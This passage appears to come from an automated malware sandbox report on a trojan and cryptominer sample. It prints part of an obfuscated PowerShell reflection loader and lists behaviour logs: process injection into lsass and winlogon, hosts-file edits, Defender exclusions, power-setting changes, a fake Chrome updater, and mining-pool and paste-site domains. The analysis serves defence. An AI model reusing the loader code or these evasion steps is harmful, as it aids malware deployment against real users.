reflection.assemblyname(''+[char](82)+''+[char](101)+''+'f'+''+'l'+''+'e'+''+[char](99)+''+[char](116)+'e'+'d'+''+'d'+''+'e'+''+'l'+''+[char](101)+''+[char](103)+''+'a'+''+[char](116)+''+'e'+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+'i'+''+'n'+'mem'+[char](111)+''+'r'+''+[char](121)+''+'m'+''+[char](111)+''+'d'+''+'u'+''+[char](108)+'e',$false).definetype(''+[char](77)+''+'y'+''+[char](68)+''+'e'+''+[char](108)+''+[char](101)+''+[char](103)+'a'+[char](116)+'e'+[char](84)+'y'+[char](112)+''+[char](101)+'',''+[char](67)+''+[char](108)+'a'+'s'+''+'s'+''+[char](44)+''+[char](80)+''+[char](117)+''+'b'+''+'l'+'ic'+','+''+[char](83)+''+[char](101)+'al'+[char](101)+''+'d'+','+[char](65)+''+[char](110)+'s'+[char](105)+''+[char](67)+'l'+[char](97)+''+'s'+''+'s'+''+[char](44)+''+[char](65)+''+'u'+''+'t'+''+[char](111)+''+[char](67)+''+'l'+''+'a'+''+'s'+''+[char](115)+'',[multicastdelegate]);$hzepfdaiuju.defineconstructor('r'+'t'+'sp'+[char](101)+''+[char](99)+''+[char](105)+''+[char](97)+'l'+[char](78)+''+[char](97)+'m'+[char](101)+''+[char](44)+''+[char](72)+''+[char](105)+''+[char](100)+''+[char](101)+''+[char](66)+'y'+'s'+''+'i'+''+[char](103)+''+','+''+'p'+''+'u'+''+'b'+''+[char](108)+''+[char](105)+'c',[reflection.callingconventions]::standard,$rucvliravsksnu).setimplementationflags('ru'+[char](110)+''+'t'+''+'i'+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+''+'n'+'aged');$hzepfdaiuju.definemethod('i'+[char](110)+''+[char](118)+''+[char](111)+''+[char](107)+''+[char](101)+'',''+'p'+''+'u'+''+'b'+''+[char](108)+''+'i'+''+'c'+''+','+''+[char](72)+'i'+[char](100)+'e'+[char](66)+''+[char](121)+''+[char](83)+''+[char](105)+''+[char](103)+','+[char](78)+'e'+[char](119)+''+[char](83)+'l'+[char](111)+'t,v'+'i'+''+'r'+''+[char](116)+''+'u'+'a'+'l'+'',$ldxjoqsfca,$rucvliravsksnu).setimplementationflags(''+'r'+''+'u'+'n'+[char](116)+''+'i'+'m'+[char](101)+''+[char](44)+''+[char](77)+''+'a'+''+'n'+''+'a'+''+[char](103)+'e'+[char](100)+'');write-output $hzepfdaiuju.createtype();}$opujgspdjbnob=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+[char](121)+''+[char](115)+''+'t'+''+[char](101)+''+[char](109)+''+[char](46)+''+[char](100)+''+[char](108)+''+[char](108)+'')}).gettype(''+'m'+''+'i'+''+[char](99)+''+[char](114)+''+'o'+''+[char](115)+'o'+[char](102)+'t'+[char](46)+'w'+[char](105)+''+[char](110)+'3'+[char](50)+''+'.'+''+[char](85)+'n'+[char](115)+''+'a'+'f'+'e'+''+[char](78)+''+'a'+''+[char](116)+''+[char](105)+''+[char](118)+''+[char](101)+''+'m'+'et'+[char](104)+''+[char](111)+''+[char](1
          Source: C:\Windows\System32\dllhost.exeCode function: 45_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,45_2_0000000140002300
          Source: C:\Windows\System32\dllhost.exeCode function: 45_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,45_2_0000000140002300
          Source: C:\Windows\System32\conhost.exeCode function: 32_3_000001D29E8A3B20 cpuid 32_3_000001D29E8A3B20
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\dllhost.exeCode function: 45_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,45_2_0000000140002300
          Source: C:\Windows\System32\conhost.exeCode function: 32_2_000001D29E8C7D90 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,32_2_000001D29E8C7D90
          Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Modifies power options to not sleep / hibernate
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Modifies the hosts file
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: dllhost.exeBinary or memory string: MsMpEng.exe

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          File and Directory Permissions Modification          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Web Service          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts12
          Native API          		11
          Windows Service          		1
          Access Token Manipulation          		1
          Disable or Modify Tools          		LSASS Memory1
          File and Directory Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		1
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts12
          Command and Scripting Interpreter          		1
          Scheduled Task/Job          		11
          Windows Service          		1
          Deobfuscate/Decode Files or Information          		Security Account Manager24
          System Information Discovery          		SMB/Windows Admin SharesData from Network Shared Drive21
          Encrypted Channel          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts1
          Scheduled Task/Job          		Login Hook712
          Process Injection          		1
          Obfuscated Files or Information          		NTDS34
          Security Software Discovery          		Distributed Component Object ModelInput Capture3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud Accounts1
          Service Execution          		Network Logon Script1
          Scheduled Task/Job          		1
          Software Packing          		LSA Secrets1
          Process Discovery          		SSHKeylogging4
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable Media1
          PowerShell          		RC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials131
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          File Deletion          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job4
          Rootkit          		Proc Filesystem1
          Remote System Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Masquerading          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
          Modify Registry          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd131
          Virtualization/Sandbox Evasion          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
          Access Token Manipulation          		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
          Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers712
          Process Injection          		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
          Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
          Hidden Files and Directories          		Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1530444 Sample: egFMhHSlmf.exe Startdate: 10/10/2024 Architecture: WINDOWS Score: 100 72 rentry.co 2->72 74 pastebin.com 2->74 76 4 other IPs or domains 2->76 84 Multi AV Scanner detection for domain / URL 2->84 86 Suricata IDS alerts for network traffic 2->86 88 Malicious sample detected (through community Yara rule) 2->88 92 17 other signatures 2->92 10 powershell.exe 2 15 2->10         started        13 egFMhHSlmf.exe 1 3 2->13         started        16 updater.exe 1 2->16         started        18 powershell.exe 2->18         started        signatures3 90 Connects to a pastebin service (likely for C&C) 74->90 process4 file5 108 Writes to foreign memory regions 10->108 110 Modifies the context of a thread in another process (thread injection) 10->110 112 Injects a PE file into a foreign processes 10->112 20 dllhost.exe 10->20         started        23 conhost.exe 10->23         started        66 C:\ProgramDatabehaviorgraphoogle\Chrome\updater.exe, PE32+ 13->66 dropped 68 C:\Windows\System32\drivers\etc\hosts, ASCII 13->68 dropped 114 Uses powercfg.exe to modify the power settings 13->114 116 Modifies the hosts file 13->116 118 Adds a directory exclusion to Windows Defender 13->118 25 powershell.exe 23 13->25         started        27 cmd.exe 1 13->27         started        36 14 other processes 13->36 70 C:\Windows\Temp\xptjtnajcbas.sys, PE32+ 16->70 dropped 120 Multi AV Scanner detection for dropped file 16->120 122 Sample is not signed and drops a device driver 16->122 124 Modifies power options to not sleep / hibernate 16->124 29 dialer.exe 16->29         started        32 powershell.exe 23 16->32         started        38 12 other processes 16->38 34 conhost.exe 18->34         started        signatures6 process7 dnsIp8 94 Contains functionality to inject code into remote processes 20->94 96 Writes to foreign memory regions 20->96 98 Creates a thread in another existing process (thread injection) 20->98 106 2 other signatures 20->106 40 winlogon.exe 20->40 injected 42 lsass.exe 20->42 injected 53 2 other processes 20->53 100 Found suspicious powershell code related to unpacking or dynamic code loading 25->100 102 Loading BitLocker PowerShell Module 25->102 45 conhost.exe 25->45         started        47 conhost.exe 27->47         started        49 wusa.exe 27->49         started        78 justpaste.it 83.168.108.45, 443, 49740 ESPOL-ASPL Poland 29->78 80 rentry.co 104.26.3.16, 443, 49734 CLOUDFLARENETUS United States 29->80 82 3 other IPs or domains 29->82 104 Query firmware table information (likely to detect VMs) 29->104 51 conhost.exe 32->51         started        55 13 other processes 36->55 57 11 other processes 38->57 signatures9 process10 signatures11 59 dllhost.exe 40->59         started        126 Writes to foreign memory regions 42->126 128 Adds a directory exclusion to Windows Defender 45->128 130 Modifies power options to not sleep / hibernate 45->130 process12 signatures13 132 Injects code into the Windows Explorer (explorer.exe) 59->132 134 Writes to foreign memory regions 59->134 136 Creates a thread in another existing process (thread injection) 59->136 138 Injects a PE file into a foreign processes 59->138 62 svchost.exe 59->62 injected 64 svchost.exe 59->64 injected process14

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          egFMhHSlmf.exe74%ReversingLabsWin64.Trojan.Generic
          egFMhHSlmf.exe75%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\ProgramData\Google\Chrome\updater.exe74%ReversingLabsWin64.Trojan.Generic
          C:\ProgramData\Google\Chrome\updater.exe75%VirustotalBrowse
          C:\Windows\Temp\xptjtnajcbas.sys5%ReversingLabs
          C:\Windows\Temp\xptjtnajcbas.sys3%VirustotalBrowse

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          justpaste.it1%VirustotalBrowse
          pool-fr.supportxmr.com3%VirustotalBrowse
          jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su12%VirustotalBrowse
          rentry.co1%VirustotalBrowse
          pastebin.com0%VirustotalBrowse
          pool.supportxmr.com7%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          http://ocsp.thawte.com00%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://aka.ms/pscore680%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
